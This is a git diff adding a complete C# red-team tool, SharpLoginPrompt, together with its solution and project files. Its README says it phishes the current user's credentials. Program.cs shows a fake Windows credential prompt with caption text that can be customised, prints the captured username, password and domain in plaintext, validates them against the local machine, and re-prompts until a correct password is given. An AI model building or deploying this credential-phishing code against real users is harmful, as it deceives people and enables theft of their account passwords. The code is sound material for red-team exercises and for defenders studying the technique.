diff --git a/.vs/SharpLoginPrompt/v15/.suo b/.vs/SharpLoginPrompt/v15/.suo new file mode 100644 index 0000000..5adafeb Binary files /dev/null and b/.vs/SharpLoginPrompt/v15/.suo differ diff --git a/README.md b/README.md new file mode 100644 index 0000000..cd2023c --- /dev/null +++ b/README.md @@ -0,0 +1,8 @@ +# SharpLoginPrompt + +This Program creates a login prompt to gather username and password of the current user. This project allows red team to phish username and password of the current user without touching lsass and having adminitrator credentials on the system. + +#Usage +run to launch it with default settings + +run to customize the login prompt diff --git a/SharpLoginPrompt.sln b/SharpLoginPrompt.sln new file mode 100644 index 0000000..97d883e --- /dev/null +++ b/SharpLoginPrompt.sln @@ -0,0 +1,25 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 15 +VisualStudioVersion = 15.0.28307.271 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SharpLoginPrompt", "SharpLoginPrompt\SharpLoginPrompt.csproj", "{C12E69CD-78A0-4960-AF7E-88CBD794AF97}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Debug|Any CPU.Build.0 = Debug|Any CPU + {C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Release|Any CPU.ActiveCfg = Release|Any CPU + {C12E69CD-78A0-4960-AF7E-88CBD794AF97}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {4FD946E1-0FF2-405D-B247-CA1B920231C5} + EndGlobalSection +EndGlobal diff --git a/SharpLoginPrompt/Program.cs b/SharpLoginPrompt/Program.cs new file mode 100644 index 0000000..d05098a --- /dev/null +++ b/SharpLoginPrompt/Program.cs @@ -0,0 +1,124 @@ +using System; +using System.Net; +using System.DirectoryServices.AccountManagement; +using System.Runtime.InteropServices; +using System.Text; + +namespace SharpLoginPrompt +{ + class Program + { + + [DllImport("ole32.dll")] + public static extern void CoTaskMemFree(IntPtr ptr); + [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] + private struct CREDUI_INFO + { + public int cbSize; + public IntPtr hwndParent; + public string pszMessageText; + public string pszCaptionText; + public IntPtr hbmBanner; + } + [DllImport("credui.dll", CharSet = CharSet.Auto)] + private static extern int CredUIPromptForWindowsCredentials(ref CREDUI_INFO notUsedHere, + int authError, + ref uint authPackage, + IntPtr InAuthBuffer, + uint InAuthBufferSize, + out IntPtr refOutAuthBuffer, + out uint refOutAuthBufferSize, + ref bool fSave, + int flags); + [DllImport("credui.dll", CharSet = CharSet.Auto)] + private static extern bool CredUnPackAuthenticationBuffer(int dwFlags, + IntPtr pAuthBuffer, + uint cbAuthBuffer, + StringBuilder pszUserName, + ref int pcchMaxUserName, + StringBuilder pszDomainName, + ref int pcchMaxDomainame, + StringBuilder pszPassword, + ref int pcchMaxPassword); + + + + static void Main(string[] args) + { + bool passwordOk = false; + while (passwordOk != true) + { + + CREDUI_INFO credui = new CREDUI_INFO(); + credui.pszCaptionText = args.Length ==2 ? args[0]:"Please enter the credentials"; + credui.pszMessageText = args.Length == 2 ? args[1] : "Domain: " + (Environment.GetEnvironmentVariable("USERDOMAIN").ToString() ?? Environment.GetEnvironmentVariable("HOSTNAME").ToString()); + credui.cbSize = Marshal.SizeOf(credui); + IntPtr outCredBuffer = new IntPtr(); + uint outCredSize; + bool save = false; + uint authPackage = 0; + + int result = CredUIPromptForWindowsCredentials(ref credui, + 0, + ref authPackage, + IntPtr.Zero, + 0, + out outCredBuffer, + out outCredSize, + ref save, + 0x1 + + /* Generic */); + var usernameBuf = new StringBuilder(100); + var passwordBuf = new StringBuilder(100); + var domainBuf = new StringBuilder(100); + + int maxUserName = 100; + int maxDomain = 100; + int maxPassword = 100; + if (result == 0) + { + if (CredUnPackAuthenticationBuffer(0, outCredBuffer, outCredSize, usernameBuf, ref maxUserName, + domainBuf, ref maxDomain, passwordBuf, ref maxPassword)) + { + CoTaskMemFree(outCredBuffer); + NetworkCredential networkCredential = new NetworkCredential() + { + UserName = usernameBuf.ToString(), + Password = passwordBuf.ToString(), + Domain = domainBuf.ToString() + + + }; + Console.WriteLine("Username = " + networkCredential.UserName); + Console.WriteLine("Password = " + networkCredential.Password); + Console.WriteLine("Doamain = " + networkCredential.Domain); + string userName; + if (networkCredential.UserName.ToString().Contains("\\")) + { + userName = networkCredential.UserName.ToString(); + } + else + { + userName = (Environment.GetEnvironmentVariable("USERDOMAIN").ToString() ?? Environment.GetEnvironmentVariable("HOSTNAME").ToString()) + "\\" + networkCredential.UserName.ToString(); + } + Console.WriteLine(userName); + try + { + PrincipalContext pcon = new PrincipalContext(ContextType.Machine, Environment.MachineName); + passwordOk = pcon.ValidateCredentials(userName, networkCredential.Password); + Console.WriteLine(passwordOk); + } + catch (System.DirectoryServices.AccountManagement.PrincipalOperationException) + { + passwordOk = false; + Console.WriteLine("Trying Again"); + } + + + } + } + } + } + } +} diff --git a/SharpLoginPrompt/Properties/AssemblyInfo.cs b/SharpLoginPrompt/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..320fc98 --- /dev/null +++ b/SharpLoginPrompt/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// General Information about an assembly is controlled through the following +// set of attributes. Change these attribute values to modify the information +// associated with an assembly. +[assembly: AssemblyTitle("SharpLoginPrompt")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("SharpLoginPrompt")] +[assembly: AssemblyCopyright("Copyright © 2019")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// Setting ComVisible to false makes the types in this assembly not visible +// to COM components. If you need to access a type in this assembly from +// COM, set the ComVisible attribute to true on that type. +[assembly: ComVisible(false)] + +// The following GUID is for the ID of the typelib if this project is exposed to COM +[assembly: Guid("c12e69cd-78a0-4960-af7e-88cbd794af97")] + +// Version information for an assembly consists of the following four values: +// +// Major Version +// Minor Version +// Build Number +// Revision +// +// You can specify all the values or you can default the Build and Revision Numbers +// by using the '*' as shown below: +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/SharpLoginPrompt/README.md b/SharpLoginPrompt/README.md new file mode 100644 index 0000000..59f92c5 --- /dev/null +++ b/SharpLoginPrompt/README.md @@ -0,0 +1 @@ +"# SharpLoginPrompt" diff --git a/SharpLoginPrompt/SharpLoginPrompt.csproj b/SharpLoginPrompt/SharpLoginPrompt.csproj new file mode 100644 index 0000000..088000d --- /dev/null +++ b/SharpLoginPrompt/SharpLoginPrompt.csproj @@ -0,0 +1,50 @@ + + + + + Debug + AnyCPU + {C12E69CD-78A0-4960-AF7E-88CBD794AF97} + Exe + SharpLoginPrompt + SharpLoginPrompt + v4.0 + 512 + true + + + AnyCPU + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + + + AnyCPU + pdbonly + true + bin\Release\ + TRACE + prompt + 4 + + + + + + + + + + + + + + + + + + \ No newline at end of file